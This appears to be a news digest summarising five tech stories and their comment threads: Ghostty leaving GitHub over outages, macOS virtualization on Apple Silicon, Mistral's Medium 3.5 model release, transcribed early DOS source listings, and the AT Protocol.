Mitchell Hashimoto, creator of Ghostty terminal emulator and GitHub user #1299 since February 2008, announced Ghostty will leave GitHub after 18 years, citing near-daily platform outages blocking productive work. Over a recent month he kept a journal marking impacted days — nearly every day got an X — with the core problem being not Git itself but centralized tooling around it: Issues, PRs, and Actions. He describes deep personal attachment to GitHub but says it is "no longer a place for serious work." The migration is incremental: a read-only mirror stays at the current URL, personal projects remain on GitHub for now, and the team is evaluating commercial and FOSS alternatives, with an announcement due in coming months. Hashimoto pre-empts two criticisms: the timing is coincidental with the large April 27, 2026 Elasticsearch outage (the post was written a week earlier referencing a separate Actions outage), and the problem is not distributed Git but GitHub's centralized infrastructure layer. He also apologizes for publicly lashing out at GitHub employees, attributing his anger to genuine long-standing affection for the platform.

Comments: Commenters broadly validate the frustrations, attributing GitHub's decline to Microsoft's acquisition, resource diversion to Copilot, and allegedly AI-generated internal code. Alternatives discussed include Codeberg, Forgejo, GitLab, Radicle, and Tangled (ATProto-based), with federation and identity portability flagged as key unsolved problems. A GitHub Staff Research Engineer is quoted saying PRs and Issues aren't seen as ideal future primitives even internally. Community fragmentation concerns are prominent, as GitHub's network effects and discovery features are seen as hard to replicate. Some users question whether daily outages are truly universal, noting GitHub's enormous scale — nearly 180M users and one billion commits per year. Copilot training on user code without consent is cited by several as a prior reason to have already left. A serious cross-repository access security vulnerability disclosed the same day adds further concern. Commenters note the dark irony that Hashimoto had to clarify in footnotes which specific outage he was even referencing.

macOS virtualization on Apple Silicon is built on a hypervisor and Virtio drivers (a standard by Rusty Russell), which abstract I/O devices so that virtualizer apps need only configure Virtio devices rather than implement low-level hardware support. Apple built Virtio into macOS with Monterey, so both host and guest must run Monterey or later. Performance is near-native: CPU single-core ~94% of host, GPU Metal ~92%, and VM Performance-core threads can outpace the host's Efficiency-core equivalent. Rosetta 2 works inside macOS VMs for 64-bit Intel apps but cannot translate a guest OS (UTM handles that via emulation). Key limitations include: most App Store apps fail due to signing restrictions; a hard cap of two concurrent VMs is enforced by macOS; iCloud requires Sequoia on both host and guest. Network always presents as Ethernet, audio is partial, and the license limits VM use to dev, testing, macOS Server, or personal non-commercial use. Practical uses include compatibility testing, sandboxed security work, running version-incompatible apps, and accessing a secondary iCloud account.

Comments: A major practical grievance is that bidirectional clipboard between macOS-on-macOS VMs is effectively broken: UTM's shared clipboard is fragile and unreliable, while Parallels explicitly does not support it for macOS guests on Apple Silicon—clipboard works for cross-platform guests (e.g., Linux) but not macOS-to-macOS. One commenter clarifies UTM is not purely a software emulator; it can use the hypervisor for ARM guests like Windows ARM, which the article's phrasing obscured. Additional notes: Apple's open-source container runtime is built on the Virtualization framework (more security-isolated than Docker), VM launch times suit serverless workloads, and snapshots work for macOS but not Linux guests. The Secure Enclave situation is unresolved—Apple ID login and enclave APIs function in VMs, but whether this uses the host enclave with a different security scope is unclear, raising concerns for automated or CI contexts. One commenter dismissed the article as AI-generated clickbait, while others found it a useful technical overview of Apple Silicon virtualization internals.

Mistral has released Medium 3.5, a 128B dense model with a 256k context window handling instruction-following, reasoning, and coding in a single set of weights, available as open weights under a modified MIT license. Scoring 77.6% on SWE-Bench Verified, it outperforms Devstral 2 and Qwen3.5 397B A17B while self-hosting on as few as four GPUs, becoming the new default in Le Chat and Vibe CLI. Remote cloud coding agents in Vibe allow async sessions to run in parallel, with local CLI sessions "teleportable" to the cloud carrying full session history and approvals. Integrations span GitHub, Linear, Jira, Sentry, and Slack, targeting high-volume defined work like refactors, test generation, and dependency upgrades. A new Work mode in Le Chat uses Medium 3.5 as a multi-step agentic backend for cross-tool workflows across email, calendar, documents, and web research, requiring explicit approval before sensitive actions. API pricing is $1.5 per million input tokens and $7.5 per million output tokens, on Pro, Team, and Enterprise plans, with open weights on Hugging Face.

Comments: Users find Medium 3.5 competitive for its size — runnable at Q4 quantization with ~70GB VRAM, approaching Mac Studio consumer territory — but not beating frontier models. A core criticism is that DeepSeek v4 Flash (MoE) achieves faster local inference at similar VRAM footprints, prompting debate over why Mistral chose a dense 128B architecture. Pricing at $1.5/$7.5 per million tokens draws skepticism since smaller Chinese models and Haiku undercut it while benchmarks show Medium 3.5 merely competitive, not dominant. Enterprise self-hosting appeal is noted — four instances fit on an H100 cluster versus one or two larger MoE rivals. A SWE-Bench contamination concern surfaces since OpenAI dropped that benchmark two months prior. Platform issues include strict CSP headers breaking JavaScript previews in Le Chat and poor Vibe CLI behavior on Windows. Users broadly support Mistral as a European alternative to US and Chinese labs, but several note the capability gap between frontier and non-frontier models has widened in the agentic era, making non-frontier choices increasingly costly in productivity.

Tim Paterson's original DOS source listings — physical printouts on continuous-feed paper — have been transcribed and published as compilable assembly source code. The collection spans 10 bundles printed between 1981 and 1982, containing the 86-DOS 1.00 kernel, various PC-DOS 1.00 pre-release kernels and utilities, and the Microsoft BASIC-86 Compiler runtime library. Key files include 86DOS.ASM, 86DOS.A86, EDLIN.DIF, CHKDSK.A86, and BASLIB.PRT. Three download tiers are offered: raw transcription of printer output, extracted original files, and fully compilable source. CRC checksums embedded in the original printout margins were used to self-verify OCR accuracy during transcription. The source targets Seattle Computer Products' ASM assembler and HEX2BIN utility, both available from early 86-DOS or MS-DOS releases. Bundles 9 and 10, totaling nearly 480 pages covering the BASIC runtime library and graphics routines (PAINT.ASM, CIRCLE.ASM), remain untranscribed and are open for pull request contributions. The release enables direct examination of whether CP/M code from Gary Kildall was incorporated into the earliest DOS version.

Comments: Microsoft published an official announcement with complementary links alongside this release. The transcription methodology is praised specifically for its use of CRC checksums printed in the listing margins to self-verify OCR accuracy — a clever approach that gave the work high fidelity. One commenter recalls working for someone in the Pacific Northwest early microcomputer scene who owned a Seattle Computer Gazelle reportedly "might be the one DOS was written on," still operational, and suggests a major tech company should find resources to acquire it for historical preservation. The most historically significant observation across comments is that having the actual assembler source now makes it possible to directly examine Gary Kildall's long-standing claim that CP/M code was copied into the first version of DOS — a question previously unanswerable without this primary source material.

AT Protocol (atproto) is a decentralized social data network developed by Bluesky where all social objects — posts, likes, follows, profiles — are stored as strongly-typed JSON records in user repositories. Records use shared schemas for composition and extension, content-IDs for strong cross-user linking, and every object has a canonical URL. The protocol exposes a public firehose (WebSocket event stream) of all public activity requiring no API key, letting developers build feeds, bots, search engines, and live applications. A bsky.storage tool automates periodic account data backups to a storage network and provides PLC identity backup and recovery, giving users stronger data control without self-hosting a full Personal Data Server (PDS). The protocol's core model is: users publish JSON records into repositories, and changestreams of those records sync across the network to drive applications — though this summary is buried behind a "GET STARTED" click rather than displayed prominently on the landing page.

Comments: Users compare AT Protocol's federation model to email interoperability between providers like Gmail and Outlook, praising its decentralized architecture as evoking the pre-big-tech open internet era, with some seeing it as a potential modern Usenet replacement. An overreacted.io post titled "A Social Filesystem" is highlighted as a strong primer on the protocol's concepts. Criticism surfaces that the concise core explanation — "users publish JSON records, changestreams sync across the network to drive applications" — is buried behind navigation rather than featured on the landing page. Interest is expressed in adding file-level permissions (read/write/list/delete for users and groups) to support private or group-scoped applications, such as a private collaborative design tool. Questions arise about the practical advantages of self-hosting a PDS versus relying on hosted infrastructure. Users also note AT Protocol's rich-text standoff markup approach and reference a retro etherpeg-style visualizer at bsky.land as a fun demonstration of the protocol's capabilities.